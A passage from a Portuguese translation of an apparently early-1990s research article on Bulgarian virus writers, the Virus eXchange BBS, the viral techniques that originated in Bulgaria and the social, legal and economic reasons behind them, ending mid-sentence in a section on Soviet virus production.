"escaneados" com o vírus ANTHRAX. Enquanto outros programadores de vírus búlgaros pareciam ser apenas irresponsáveis ou de mentalidade infantil, Dark Avenger pode ser classificado como um "tecnopata". Ele é um usuário regular de vários BBSes búlgaros, tanto que qualquer um pode facilmente contactá-lo via email. Quando indagado por que seus vírus são destrutivos, ele respondeu que "destruir dados é um prazer" e que ele "apenas adora destruir o trabalho dos outros". Infelizmente, nenhuma medida pode ser tomada contra ele na Bulgária. Uma vez que não existem leis para proteção de informação, suas atividades não são ilegais lá. Ele poderia ser facilmente pego grampeando-se os telefones das BBSes que usa, mas as autoridades da lei não podem tomar tais medidas, uma vez que não há evidência de atividades ilegais. Aliás, ele sabe disso perfeitamente. 2.4) Lubo & Ian. Alguns dos vírus de Dark Avenger provaram ser bastante "famosos" e causaram verdadeiras epidemias. Isto porque eles são frequentemente imitados por outros programadores de vírus, que não têm imaginação para desenvolver seus próprios vírus, mas que têm inveja da fama de Dark Avenger. Assim, eles apenas "dissassemblavam" seus vírus (especialmente o primeiro) e usavam suas partes -- muitas vezes sem ao menos entender o que faziam. Assim é o caso com os vírus MURPHY. De acordo com uma seqüência de caracteres contida neles, eles foram escritos por "Lubo & Ian, Laboratório USM, Sofia." Estes caras usaram seus verdadeiros nomes. Lubo já foi entrevistado várias vezes por publicações importantes. Eles dizem que o vírus foi escrito por vingança. Eles fizeram um trabalho importante para seu chefe e depois ele não os pagou. Isto é o motivo pelo qual eles desenvolveram e soltaram o vírus numa mesma noite. O fato do vírus poder se espalhar para fora do laboratório não passou por suas mentes. Entretanto, isso não explica o desenvolvimento de outras versões do mesmo vírus (existem pelo menos quatro variantes). Contudo, isso prova mais uma vez que é melhor (e mais seguro, também) pagar bem os "bons" programadores. Além de MURPHY, estes dois programadores criaram outro vírus, chamado SENTINEL (com cinco variantes). A única coisa diferente neste vírus é que ele foi escrito numa liguagem de programação de alto nível (Turbo Pascal), e que não sobrescreve os arquivos que infecta como a maioria dos vírus escritos em linguagens de alto nível. Ele é capaz de infectar arquivos .COM e .EXE anexando-se a eles e preservando sua total funcionalidade. É também um vírus residente, que esconde o aumento do arquivo quando o usuário usa o comando DIR. Também é um vírus mutante. 2.5) O programador de vírus de Plovdiv. Este homem, PD, alega que ele escreve vírus "por diversão" e "apenas para si" e que "nunca os espalhou". Infelizmente, pelo menos dois deles "escaparam" por acidente. São os vírus ANTI-PASCAL605 e TERROR. Especialmente o último é extremamente virulento e causou uma vasta epidemia na Bulgária. PD ficou bastante triste com isso e enviou exemplos de todos os seus vírus para pesquisadores. Assim, vacinas contra seus vírus foram desenvolvidas -- para o caso de outros escaparem também. Estes vírus variavam dos extremamente estúpidos até os mais sofisticados. Alguns deles: XBOOT, ANTIPASCAL (5 variantes), TINY (11 variantes), MINIMAL-45, TERROR, DARK LORD, NINA, GERGANA, HAPPY NEW YEAR (2 variantes), INT 13. PD alega que o vírus DARK LORD (uma variante menor de TERROR) não foi escrita por ele. A família de vírus TINY nada tem a ver com o TINY dinamarquês (uma variação de 163 bytes do vírus KENNEDY), e assim como o vírus MINIMAL-45, foi escrito apenas com a intenção de ser o menor vírus do mundo. Hoje, PD não escreve mais vírus -- porque "é tão fácil, que não é mais interessante", de acordo com suas palavras. Atualmente, ele está escrevendo programas anti-vírus -- dos bons ! 2.6) Os dois rapazes de Varna Eles são dois estudantes (VP e SK) da Mathematical High School de Varna (uma cidade as margens do Mar Negro). Eles desenvolveram vários vírus e continuam fazendo isso, produzindo vírus cada vez mais sofisticados. Além disso, eles espalham seus vírus intencionalmente, geralmente em escolas de computação ou na Universidade Técnica em Varna. Quando perguntados por que escrevem vírus e os espalham eles disseram "porque é muito interessante !" Os vírus escritos por eles são: MG (5 variantes), SHAKE (5 variantes), DIR and DIR II. Todos eles são residentes em memória e infectam arquivos quando o comando DIR é utilizado. O último é extremamente virulento e sofisticado -- tão sofisticado como THE NUMBER OF THE BEAST. Também é um novo tipo de vírus -- ele não infecta setores de boot nem arquivos. Ao invés disso, infecta o sistema de arquivos como um todo, mudando a informação nas entradas de diretórios, assim todos os arquivos parecem começar com o vírus. Existe um contador do número de sistemas infectados no corpo do vírus. Existem evidências que VP e SK coletam arquivos infectados, copiam o conteúdo do contador e desenham uma curva da disseminação do vírus. Fazem isso "por diversão". 2.7) O caso WT WT é um programador de vírus de Sofia que escreveu dois vírus -- WT (com duas variantes) e DARTH VADER (com quatro variantes). De acordo com suas próprias palavras, ele fez isso para testar uma nova idéia e para ganhar acesso a Virus eXchange BSS (leia mais abaixo). A nova idéia consistia de um vírus (DARTH VADER) que não aumentava o tamanho do arquivo, porque ele procurava por "buracos", preenchidos com zeros, e se copiava lá. Além disso, o vírus não realizava nenhuma operação de escrita. Ao invés disso, ele esperava até que um arquivo .COM fosse gravado por um comando DOS e o modificava a imagem do arquivo em memória instantes antes dele ser gravado. WT não escreve mais vírus, mas é extremamente interessado nesta área. Ele coleciona vírus sofisticados e os estuda, buscando novas idéias. 2.8) Naughty Hacker. Este programador de vírus, MH, é um estudante e vive em Sofia. Ele escreveu vários vírus, a maioria deles contendo a seqüência "Naughty Hacker" (Hacker Desobediente). Todos eles não são destrutivos, mas causam diferentes efeitos no vídeo -- desde uma desincronização até uma bola saltitante. Atualmente, pelo menos oito variantes diferentes foram isoladas, mas acredita-se que existam mais e que estejam se replicando por aí. Acredita-se também que MH continua a produzir vírus. Como sempre, ele faz isso "porque é muito interessante" e "por diversão". Ele também é o autor de três vírus de boot bastante simples (BOOTHORSE e dois outros que continuam sem nome). 2.9) Outros programadores de vírus conhecidos As pessoas listadas acima são os maiores produtores de vírus búlgaros. Entretanto, eles não são os únicos. Várias outras pessoas na Bulgária escreveram pelo menos um vírus (ás vezes mais). De fato, fazer um vírus é considerado atualmente uma espécie de esporte, brincadeira ou um meio de se destacar. Alguns destes programadores de vírus enviaram suas criações diretamente para pesquisadores, como se estivessem esperando uma recompensa. Isso ocorre frequentemente -- provavelmente eles esperam que o pesquisador, sendo uma pessoa bastante qualificada, avaliará melhor o seu trabalho. Ás vezes, o fato de seus vírus tornarem-se conhecidos, serem descritos, e incluídos nos melhores anti-vírus do mercado é suficiente para estas pessoas e elas não se preocupam em espalhar seus vírus por aí. Então, a provável razão para que estas pessoas criem vírus é a busca pela glória e fama. Alguns destes programadores búlgaros são VD de Pleven (MICRO-128), AS e RD de Mihajlovgrad (V123), ID de Trojan (MUTANT,V127, V270x), K.D. de Tutrakan (BOYS, WARRIER, WARRIOR, DREAM) entre outros. 2.10) Programadores de vírus búlgaros desconhecidos É claro, existem também outros programadores de vírus que não são conhecidos pelo autor deste artigo. Algumas vezes é possível determinar a cidade onde o vírus foi desenvolvido -- geralmente por uma seqüência de caracteres no corpo do vírus, ou porque o vírus não é encontrado em mais nenhum lugar. Alguns destes vírus são bem simples, enquanto outros são bem sofisticados. Alguns exemplos destes vírus: - O vírus KAMIKAZE foi detectado apenas no Instituto de Matemática da Academia búlgara de Ciências, em Sofia e provavelmente, foi feito lá; - O vírus RAT, feito em Sofia, como está escrito em seu corpo; - O vírus VFSI (Happy Day) vírus foi desenvolvido no Instituto Superior de Finanças e Economia em Svishtov (uma pequena cidade no Danúbio) por um programador desconhecido; - O vírus DESTRUCTOR, feito provavelmente em Plovdiv, onde foi detectado pela primeira vez; - O vírus PARITY, feito provavelmente na Universidade Técnica de Sofia, uma vez que não foi detectado em nenhum lugar mais; - Os vírus de arquivo e boot TONY, provavelmente criados em Plovdiv, onde eles foram detectados pela primeira vez; - O vírus ETC, detectado apenas em Sofia; - O vírus 1963, um vírus bastante sofisticado, provavelmente feito na Universidade de Sofia; - O vírus JUSTICE. 2.11) Virus eXchange BBS Mais ou menos um ano atrás, a escrita de vírus na Bulgária entrou numa nova fase. Os programadores de vírus começaram a se organizar. O primeiro passo foi a criação de uma BBS especializada, dedicada a troca de vírus -- a Virus eXchange BSS. Seu operador (sysop), TT é um estudante de Ciências da Computação da Universidade de Sofia. Ele montou a BBS em sua própria casa. Nesta BBS, existem dois tipos predominantes de arquivos -- vírus e anti-vírus. Os anti-vírus podem ser baixados gratuitamente. Para ganhar acesso a área de vírus, é preciso fazer um "upload" de um vírus novo. Portanto, qualquer um que faça o "upload" de um vírus novo, ganha acesso a coleção inteira de vírus. A pessoa poderia então, baixar todos os vírus disponíveis. Nada mais é perguntado. Além disso, o SysOp não se importava com a identidade de seus usuários. Eles podiam usar nomes falsos e eram até incentivados a fazer isso. Dark Avenger e WT, entre todos os usuários, eram os mais ativos, mas haviam também nomes como George Bush de Nova Iorque, Saddam Hussein de Bagdá, Ozzy Ozburn e outros. Uma vez que esta BBS tinha uma vasta coleção de vírus (quase 300), era muito difícil encontrar novos vírus para ela. Se alguém queria ganhar acesso a área de vírus, era muito mais simples escrever um novo vírus, ao invés de tentar achar um novo. Foi isso que WT fez. Além disso, nesta BBS existem todos os tipos de vírus -- alguns como 1260, V2P6Z, FLIP, WHALE que são considerados extremamente perigosos, uma vez que usam várias novas idéias e truques inteligentes, que os fazem muito mais difícies de serem reconhecidos e removidos de arquivos infectados. E a política da Virus eXchange BBS faz com que estes vírus estejam disponíveis para qualquer pessoa que se interesse em baixá-los. Isto levará, sem sombra de dúvidas, a criação de mais e melhores vírus num futuro próximo. Esta disponibilidade de vírus já deu seus frutos. Ela ajudou vírus criados em lugares bem distantes da Bulgária e que não estava muito espalhados, a gerar verdadeiras epidemias no nosso país. Veja o caso do vírus DATALOCK. Foi criado na Califórnia, EUA e colocado ("uploaded") na BBS. Semanas mais tarde, foi detectado na Universidade Técnica de Sofia. Provavelmente, algum usuário da BBS o baixou e o espalhou "por diversão". De maneira similar, os vírus INTERNAL, TYPO e 1575 entraram em nosso país. Mas a disponibilidade destes vírus não é a coisa mais perigosa. Uma vez que são conhecidos, existem anti-vírus que os detectam e os removem. A coisa mais perigosa nisso tudo é o fato da BBS disponibilizar o código fonte de vários vírus. Só para citar alguns: DARK AVENGER, OLD YANKEE, DIAMOND, AMSTRAD, HYMN, MLTI830, MURPHY, MAGNITOGORSK, ICELANDIC, MIX1, STONED, JERUSALEM, DATACRIME, BURGER, ARMAGEDON, OROPAX, DARTH VADER, NAUGHTY HACKER, 512, VIENNA, 4096, FISH#6, PING PONG, BLACK JEC, WWT, MG, TSD, BOOTHORSE, BAD BOY, LEECH... A maioria com código fonte. A publicação do código fonte de um vírus provou ser o maior perigo nesta área. VIENNA, JERUSALEM, CASCADE e AMSTRAD são os melhores exemplos. Seu código fonte se tornou de domínio público o que levou a criação de inúmeros variantes destes vírus. As variantes conhecidas destes 4 vírus são cerca de 20% de todos os vírus conhecidos, o que significa cerca de centenas de variantes. De fato, este processo apenas começou. Os vírus HIV, MIGRAM, KAMASYA, CEMETERY e ANTICHRIST obviamente foram criados por alguém que teve acesso ao código fonte do vírus MURPHY. O vírus ENIGMA é claramente baseado no OLD YANKEE. Existem vários relatos sobre infecções destes vírus num escola italiana e um programador de vírus conhecido como Cracker Jack é um usuários da Virus eXchage... Os danos causados apenas por essa BBS ao resto do mundo é bastante grande. Mas isso não é tudo. Esta posse de "conhecimento virótico" (i.e., vírus vivos, código fonte de vírus, etc) sempre motivou hackers e mesmos os pesquisadores a trocarem tais dados apenas entre si numa maneira bastante restrita. Não é de se assustar que tais BBSes começassem a surgir no mundo todo. Existem BBSes deste tipo nos EUA, Alemanha, Itália, Suécia, Tchecoslováquia, Reino Unido e URSS. Parar suas atividades é algo bastante difícil em termos legais, porque a posse, armazenamento ou dowload intencional de vírus de computador geralmente não é considerado crime. E nem poderia ser, uma vez que os pesquisadores não teriam outro modo de trocar vírus para trabalhar. A criação de uma BBS de vírus, com seu sysop criando, espalhando e trocando vírus não passou desapercebido na Bulgária. A maioria dos programadores de vírus adquiriram um modem (uma coisa não muito fácil na Bulgária) e conectaram-se. Após isso, eles começaram a trocar mensagens atráves da BBS. Eles criaram uma conferência (fórum) local a Bulgária, a fim de trocar idéias sobre como criar vírus mais inteligentes. Portanto, eles começaram a se organizar -- uma coisa que não pode ser dita sobre as comunidades de programadores de anti-vírus de todas as nações. 3) Novas idéias Como pode ser visto nos exemplos acima, a Bulgária inteira tornou-se uma espécie de laboratório de desenvolvimento de vírus, onde qualquer estudante ou programador capaz (ou mais ou menos capaz) se viu tentado a escrever seu próprio vírus e testá-lo por aí. Não é estranho que várias idéias completamente novas foram desenvolvidas em nosso país. Tentarei enumerar algumas (apenas as mais importantes): - a técnica de rastreio de interrupção, capaz de achar a rotina original (no DOS ou na BIOS) de qualquer vetor de interrupção, foi implementada nos vírus YANKEE DOODLE (TP). Depois, outros vírus em todo mundo começaram a usá-la (4096, NAUGHTY HACKER); - os vírus "fast infectors" que infectam um arquivo durante sua abertura ou qualquer operação foi desenvolvido primeiramente na Bulgária. O primeiro vírus deste tipo foi o DARK AVENGER. Agora, existem vários "fast infectors". Um deles -- 1963 -- e infectava até na deleção de um arquivo (!) - os vírus "semi-stealth" -- vírus que ocultavam o aumento do tamanho de arquivos infectados (o vírus 651) ou que se removiam dos arquivos infectados quando alguém os carregasse num debugador (YANKEE DOODLE); - ocultar o verdadeiro tamanho de um arquivo geralmente causa problemas, porque CHKDSK (ou SCANDSK) é capaz de detectar a diferença entre o espaço em disco marcado como usado na FAT e o tamanho do arquivo. Apenas dois vírus búlgaros foram capazes de tratar este problema -- DIAMOND e V2100. - o primeiro vírus realmente "stealth" -- o vírus 512 era búlgaro. É verdade entretanto, que a idéia tenha surgido ao mesmo tempo em outras partes do mundo (o vírus 4096 de Israel); - o único vírus "stealth" conhecido, que se escondia a nível de BIOS (i.e., não pode ser detectado se ativo na memória mesmo que o arquivo infectado fosse lido a nível de setor e não a nível de arquivo) é o vírus búlgaro INT13; - um dos primeiros vírus multi-partite (vírus que são capazes de infectar arquivos e setores de boot) -- o vírus ANTHRAX, foi desenvolvido na Bulgária. É verdade, entretanto, que idéias similares foram observadas nos vírus 4096 e GHOST BALLS que haviam sido desenvolvidos muito tempo antes. Outros vírus multi-partite (VIRUS-101, V-1, FLIP, INVADER) foram criados independentemente quase que no mesmo temp (e mesmo antes) em outras partes do mundo. - A idéia usada inicialmente no vírus LEHIGH -- colocar o vírus numa área não utilizada do arquivo COMMAND.COM foi utilizada mais tarde em vários vírus búlgaros. Todos podiam infectar qualquer arquivo .COM e .EXE da maneira tradicional, mas quando infectavam o arquivo COMMAND.COM, colocavam-se na área não utilizada do mesmo. Exemplos destes vírus : TERROR, NAUGHTY HACKER e outros. - O método mencionado acima foi utilizado posteriormente por outros vírus búlgaros. Eles repararam que qualquer trecho de zeros de qualquer arquivo (não apenas o COMMAND.COM) poderia ser utilizado para esconder um vírus. Os vírus que usam este método são búlgaros -- PROUD, EVIL, PHOENIX, RAT, DARTH VADER ... Este último nem mesmo se coloca dentro de um arquivo -- deixa esta tarefa para o DOS. E o vírus RAT esconde-se em partes não utilizadas do cabeçalho de uma arquivo .EXE. - um dos vírus mais mutantes é o vírus LEECH de Dark Avenger. Ele pode ter mais de 4,5 bilhões de variantes. É verdade, entretanto, que ele não é o primeiro vírus inteiramente mutante (1260 foi o primeiro), e nem foi o que apresentou um mecanismo de mutação mais flexível (seu mecanismo é muito mais simples que o V2P6Z). - um tipo de vírus completamente novo (DIR II) foi desenvolvido por dois estudantes búlgaros. O vírus não infectava arquivos nem setores de boot. Ao invés disso, infectava o sistema de arquivo como um todo, ou sendo mais claro, entradas de diretórios. - diferentes truques para se pegar o controle sem tratar diretamente o vetor da INT 21h foram desenvolvidos por vários programadores búlgaros. O vírus TERROR colocava uma instrução JMP para seu código na rotina original de tratamento da INT 21h. Os vírus da família PHOENIX (800, 1226, PROUD, EVIL, PHOENIX) tratavam um interrupção que era chamada pelo DOS em qualquer função relacionada com arquivos (INT 2Ah, AH=82h). O vírus DIR II colocava-se entre a cadeia dos drivers de dispositivos de discos do DOS. - o primeiro vírus que era capaz de infectar drivers de dispositivo (device drivers) (arquivos .SYS apenas), é búlgaro. É o vírus HAPPY NEW YEAR (1600). - o primeiro vírus totalmente funcional escrito inteiramente numa linguagem de auto nível (Turbo Pascal) foi o vírus búlgaro SENTINEL; - o vírus búlgaro ANTHRAX foi o primeiro vírus temporariamente residente em memória. Ele removia-se da memória depois de infectar o primeiro arquivo e passava a agir como um vírus não-residente. - o menor vírus residente em memória no mundo IBM PC -- apenas 128 bytes -- foi desenvolvido na Bulgária. Existem relatos sobre um vírus residente de 108 bytes, também da Bulgária, mas isso ainda não foi confirmado. - o menor vírus no mundo IBM PC -- apenas 45 bytes -- é o vírus búlgaro MINIMAL-45. Parece que é possível, entretanto, diminuir ainda mais este tamanho -- até 31 bytes, com grande perda de confiabilidade. 4) Por que tantos vírus são criados na Bulgária Vírus de computador são criados em todas as partes do mundo, não apenas na Bulgária. Entretanto, boa parte deles foram criados em nosso país. Entretanto, no mundo todo existem pré-condições que fazem com que a criação de vírus seja tentadora, mas na Bulgária existem condições específicas para isso. 4.1) Razões específicas pelo desenvolvimento de vírus na Bulgária 4.1.1) A primeira e mais importante razão é a existência de um grande exército de jovens extremamente qualificados que ainda não são economicamente ativos. A informatização na Bulgária começou sem razões econômicas. Uma vez que nosso país é um país socialista, sua economia é do tipo administrativa. A economia não precisava ser informatizada. De fato, computadores e economia planejada são incompatíveis -- computadores ajudam você a produzir mais em menos tempo e com menos esforço e dinheiro, enquanto o objetivo de um gerente numa economia planejada é atingir as metas que lhes foram dadas -- nem em menor tempo ou com menos dinheiro. Entretanto, os líderes do partido comunista da Bulgária decidiram que deveriamos nos informatizar -- principalmente para ser capaz de fornecer computadores para a União Soviética e fugir do embargo. A informatização em si não é uma coisa ruim, ocorreu que cometemos um grave erro. A economia búlgara era muito fraca (agora é muito mais), mas nós tinhamos várias pessoas qualificadas. Logo, não deveríamos ter tentado produzir hardware enquanto tinhamos boas chances na indústria de software, onde é necessário basicamente "brainware". Entretanto, a Bulgária fez o oposto. Ao invés de comprar hardware, começamos a produzi-lo (basicamente clones de PCs e Apples). Ao invés de começarmos a produzir nossos próprios softwares e tentar vendê-los para o ocidente, começamos a roubar programas ocidentais, mudar seus copyrights e revendê-los (principalmente na Bulgária, URSS, e outros países do bloco comunista). Atualmente, a maioria dos softwares ocidentais tem esquemas de proteção contra cópias. Ao invés de treinarmos nosso pessoal para escrever programas, começamos a treiná-los para quebrar estes esquemas de proteção. E tivemos sucesso nesta área. Os crackers búlgaros são os melhores. Além disso, eles não tem nenhuma esperança em criar e vender seus próprios programas, uma vez que, devido a inexistência de leis sobre direitos autorais, é impossível vender mais que duas ou três cópias de uma programa na Bulgária. O restante é copiado. Uma vez que a introdução de computadores em escritórios búlgaros não foi um processo natural, mas devido a uma ordem administrativa, frequentemente estes computadores não eram usados -- eram considerados apenas objetos de prestígio. Frequentemente sobre a mesa de um diretor, próximo ao telefone, estava um computador pessoal. O próprio diretor quase nunca usava-o -- entretanto, algumas vezes seus filhos vinham até o escritório para usá-lo -- para jogar ou fuçar. Enquanto o preço dos computadores pessoais na Bulgária era muito alto para permitir que um cidadão comum tivesse seu próprio computador, era comum usar o computador do trabalho para razões pessoais. Ao mesmo tempo, o ensino de informática era amplamente introduzido na Bulgária. Todos são instruídos nesta área -- de crianças no jardim da infância até velhos professores que tinham apenas alguns anos até a aposentadoria. Uma vez que este tipo de ciência é compreendida melhor por mentes mais jovens, não é de se assustar que as pessoas que mais se destacavam eram jovens. Muito jovens e imaturos. Nos esforçamos muito para ensinar estas pessoas a programar mas esquecemos de educá-las no campo da ética. Além disso, a falta de respeito com o trabalho de outros é um problema comum nas sociedades socialistas. 4.1.2) A segunda razão principal é a prática mundial de pirataria de software e os baixos salários dos programadores. Como mencionado acima, a Bulgária tomou a decisão errada de produzir computadores e roubar programas. Não existem leis de direitos autorais (copyright) no que se diz respeito ao programas de computador. Devido a isso, a pirataria é uma prática extremamente comum. De fato, quase todo software utilizado é pirata. A maioria das pessoas que os utilizam nunca viram os discos originais e nem a sua documentação. Uma vez que todo tipo de programa (de jogos a programas de editoração) eram copiados freqüentemente, isso ajudou a espalhar os vírus. Ao mesmo tempo, o trabalho de um programador médio era remunerado muito mal -- não havia chances de vender seu software. Mesmo agora, um programador na Bulgária ganha 100 a 120 vezes menos que um com a mesma qualificação nos EUA. Isto levou vários jovens a se revoltarem contra a sociedade que não era capaz de avaliá-los como deveria. Existe apenas um passo na transformação destes jovens em criadores de vírus destrutivos. Alguns deles (e.g., Dark Avenger) deram este passo. 4.1.3) A terceira maior razão é a total ausência de leis contra criação e distribuição de vírus de computador e contra acesso ilegal e modificação de informação digital. Devido a ausência de leis de direitos autorais sobre software, simplesmente não existe nada como propriedade de informação digital na Bulgária. Portanto, a modificação ou mesmo destruição de informação digital não é considerada crime -- uma vez que nenhuma propriedade foi danificada. A legislação búlgara está bastante atrasada nesta área. Além disso, mesmo que novas leis sejam criadas no futuro, estas leis não poderão ser aplicadas aos delitos que ocorreram no passado. Portanto, os programadores de vírus continuam não tendo nada a temer. Este é o motivo pelo qual a criação de novos vírus de computador tornou-se uma espécie de esporte ou diversão na Bulgária. 4.1.4) A próxima razão é a fraca organização de combate a vírus de computador na Bulgária. Neste momento nosso país encontra-se numa profunda crise econômica. Faltam verbas para tudo, incluíndo comida e gasolina. Ao mesmo tempo, a organização de combate a vírus necessita de dinheiro -- para o estabelecimento de uma rede de pesquisa de vírus que os coletariam e os investigariam, equipadas com o melhor hardware, e com canais de comunicação entre os laboratórios, etc. Uma maneira efetiva de comunicação é o correio eletrônico -- e a Bulgária ainda não tem um sistema de correio eletrônico -- e ainda está dando seus primeiros passos para ligar-se a Internet. Tudo isso necessita de muito dinheiro -- dinheiro que nosso governo não possui neste momento. 4.1.5) Outra razão é a idéia incorreta que a sociedade tem sobre o problema dos vírus de computador. As vítimas de ataques de vírus de computador consideram-se vítimas de uma piada de mau gosto, não vítimas de um crime. 4.1.6) O motivo menos importante, em minha opinião, é a disponibilidade e fácil acesso a informação. Todos os tipos de truques de como enganar o sistema operacional circulam entre hacker búlgaros. Alguns deles são frequentemente publicados em revistas de informática. Como mencionado acima, existe ainda uma BBS especializada em vírus. Somente para citar, o famoso arquivo INTERxyy, publicado por Ralf Brown nos EUA como shareware. É muito popular na Bulgária, já que contém vários truques não documentados. Entretanto, isso não é uma razão muito importante. Geralmente aqueles que tem decidido fazer um vírus já sabem como fazê-lo. Eles não tem que pegar um vírus existente e modificá-lo. A prova é a predominância de vírus búlgaros originais sobre variantes de vírus conhecidos. 4.2) Motivos genéricos Já que os vírus são criados em todas as partes do mundo, deve haver também alguns motivos genéricos para isso. Estes motivos são, é claro, válidos para a Bulgária também. Vamos ver quais são. 4.2.1) Busca pela fama Todo programador sonha em ter seu programa amplamente distribuído e usado. Vários programadores escrevem e distribuem ótimos programas gratuitamente -- apenas com a intenção de ter mais usuários utilizando seus programas. Entretanto, para que um programa seja usado, ele deve ser bom o bastante. E não é qualquer programador que pode fazer uma programa bom o bastante para que todos o utilizem -- mesmo sendo de graça. Ao mesmo tempo, os vírus de computador espalham-se muito rapidamente não importando se os usuários queiram ou não. Assim, quando um programador de vírus lê num jornal que seu vírus foi descoberto no outro lado do mundo, ele sente alguma espécie de prazer pervertido. Alguns fazem vírus apenas para ver seus nome (e os nomes dos seus vírus) publicados em jornais. O motivo ainda tem outro aspecto. No ínicio da era dos vírus, quando a idéia de um vírus de computador era inédita, apenas os bons programadores foram capazes de fazer um. Tornou-se um mito comum que se você pode fazer um vírus, você é um grande programador. Este mito podia valer naquela época, mas hoje não faz o menor sentido. Contudo, jovens começam a escrever seus vírus -- apenas para provar para seus amigos e para o resto do mundo que são bons programadores. Alguns deles não são capazes de criar algo original -- por isso, eles pegam um vírus conhecido, modificam um pouco e lançam esta nova mutação. Isto explica porque existem tantas variantes dos vírus mais simples que já foram criados -- BRAIN, JERUSALEM, STONED, VIENNA, CASCADE ... Um exemplo típico é o programador de vírus italiano que intitula-se de Cracker Jack. 4.2.2) Pura curiosidade Alguém tem que admitir que a idéias de um programa que é capaz de se reproduzir por seus próprios meios, esconder-se do usuário (que acredita manter seu computador sobre controle), e agir como se fosse um ser vivo é algo fascinante. Apenas a curiosidade humana é suficiente para fazer que algumas pessoas - se são jovens e irresponsáveis o suficiente - tentem fazer um vírus. Algumas pessoas conseguem. Uma grande parte, se considerarmos a quantidade de novos vírus que surgem. Alguns dizem que estão programando os vírus "apenas para si". Entretanto, é quase que impossível controlar totalmente a replicação de um vírus bem feito. Quanto mais inteligentes os vírus são, maior a probabilidade deles escaparem. Existe a idéia de ensinar estudantes como os vírus são feitos -- é claro que num ambiente extritamente seguro. Talvez, alguns deles terão sua curiosidade preenchida e não tentarão escrever seus próprios vírus. Talvez, se forçarmos todos os estudantes de ciência de computação a aprender os teoremas do Dr. Fred Cohen sobre os aspectos computacionais de vírus de computador, se administrarmos exames e pedirmos que os alunos desenvolvam esquemas de proteção de vírus ou que ajudem alguns usuários atacados por vírus como se fosse um projeto do curso -- bem, talvez neste caso estes alunos terão tantos problemas com vírus que não irão querer ouvir nada sobre o assunto nunca mais -- muito menos fazer seus próprios vírus. 4.2.3) Fácil acesso a informação Informação para se escrever um vírus pode ser facilmente encontrada. Esta informação é muito mais acessível fora da Bulgária. A pessoa que quiser escrever um vírus comum apenas precisa procurar os respectivos "manuais" -- manuais que não são facilmente encontrados na Bulgária. 4.2.4) Interesses militares Frequentemente ouvimos que as superpotências estão pesquisando como utilizar vírus de computador para destruir os sistemas inimigos. É muito provavel que, em vários países tais pesquisas estejam sendo feitas. Existem relatos sobre isso nos EUA, França e URSS. Isto é maravilhoso -- é o direito de toda força militar investigar qualquer nova idéia e considerar as possíveis utilidades e/ou ameaças que isso possa causar a defesa nacional. Entretanto, é quase improvável que vírus de computador possam ser usados para este propósito. Assim como vírus de verdades, os de computador são capaz de se espalhar apenas entre indivíduos de espécies similares, i.e. -- entre computadores compatíveis. Os computadores mais usados são IBM PC, Macintosh, Amiga e Atari ST. Não é de se espantar que a grande maioria dos vírus de computador seja capaz de infectar apenas estes computadores. Mesmo assim, vírus que infectam um tipo de computador (digamos, um PC), não são capazes de se replicar (ou mesmo serem executados) em outro (e.g., um Macintosh). Normalmente eles não são nem capazes de serem executados em dois sistemas operacionais diferentes de um mesmo computador. Mesmo uma versão diferente do mesmo sistema operacional pode causar grandes problemas para um vírus. Os computadores pessoais nunca são utilizados para realizar tarefas realmente importantes no exército. Portanto, mesmo se um vírus infecte um deles e destrua todos seus dados, o dano não será de grande importância. Computadores que são usados para tarefas realmente importantes como controle de mísseis e satélites, são computadores especializados. Seus programas geralmente são gravados em ROMs e apenas dados entram neles. Não é possível inserir um disquete infectado em um PC em um computador que controle o sistema NORAD. Ainda assim, os computadores que controlam dispositivos diferentes, geralmente são incompatíveis entre si. Portanto, mesmo se alguém escreva um vírus para um destes computadores especializados, o vírus não será capaz de infectar os outros computadores. Portanto, este vírus não se espalhará muito. E por último, este vírus tem que ser colocado em algum dos computadores inimigos. Mas, se você tem acesso aos computadores do inimigo, você não precisa de um vírus. Você pode realizar a mesma tarefa (e muito mais facilmente) "manualmente", ou com um "cavalo de tróia" ou uma "bomba lógica". 4.2.5) Interesses corporativos É também frequentemente especulado se as grandes empresas de software e produtores de anti-vírus fazem ou espalham propositalmente vírus de computador. (Nota do editor: boa matéria para a seção Cons.pi.ra.ção) Existe alguma razão por trás disso. Realmente o medo dos vírus pode fazer o usuário comprar apenas software original (às vezes -- bastante caros), e não usar cópias piratas, shareware ou freeware. Ao mesmo tempo, empresas que produzem anti-vírus estão interessadas que seus produtos vendam. E venderão, se o usuário precisar de proteção contra vírus. Entretanto, é pouco provável que uma empresa de software (que produza ou não anti-vírus) arrisque a tornar-se conhecida como propagadora de vírus. Ela provavelmente será boicotada pelos seus usuários e as perdas de serão muito maiores que os lucros. Assim como os produtores de anti-vírus, elas não precisam escrever vírus a fim de vender seus programas. Basta aproveitar o estrondo que a mídia faz sobre o assunto, e mencionar quantos vírus existem e quantos deles seus maravilhoso produto é capaz de evitar. 5) A fábrica de vírus soviética e a produção de vírus em outros países do bloco comunista Enquanto a Bulgária é um dos países mais informatizados da Europa Oriental, as condições políticas, econônicas e sociais em outros países são bastante parecidas. Este é o motivo pelo qual a programação de vírus e sua disseminação também ocorreu nestes países. Vírus são criados na Polônia ( W13, 217, 583, FATHER CHRISTMAS, DOT EATER, JOKER, VCOMM, AKUKU, 311, HYBRYD), na Hungária ( STONE `90, FILLER, MONXLA, POLIMER, TURBO KUKAC), na Tchecoslováquia (AANTIVIRUS), e mesmo na Iugoslávia ( 17Y4, SVIR). De acordo com alguns relatos da Romênia, existem programadores de vírus lá, mas os vírus W13, YANKEE DOODLE, DARK AVENGER e StONED estão bastante difundidos. Entretanto, o país mais parecido com a Bulgária é, sem sombra de dúvidas, a União Soviética. De acordo com o pesquisador de vírus Bezrukov, o primeiro vírus apareceu por lá quase que na mesma época que na Bulgária e, pelo jeito, foi o mesmo vírus (VIENNA). Portanto, as condições eram quase que idênticas as do nosso país. Existem, entretanto, duas diferenças principais: o nível de informatização e o número de programadores de vírus. O nível de informatização continua muito menor do que na Bulgária. Existem muito menos computadores por pessoas do que em nosso país. Os usuários são muito mais isolados, devido as grandes distâncias. A rede telefônica apresenta a mesma condição miserável que a Bulgária. As redes são poucas e não são muito usadas. Por exemplo, somente em Sofia, existem mais nós FidoNet do que na União Soviética inteira. Não é seguro enviar disquetes via correio, porque eles provavelmente serão extraviados. Todo estes problemas atrapalham na disseminação dos vírus. Infelizmente, isto também atrapalha a distruição de anti-virus e a troca de informação entre os pesquisadores. Por exemplo, exemplos de novos vírus criados lá só chegam até os pesquisadores do bloco ocidental após um longo período. Infelizmente, um outro fator é muito mais perigoso. Na URSS, existem mais programadores do que na Bulgária e eles parecem estar muito motivados em criar novos 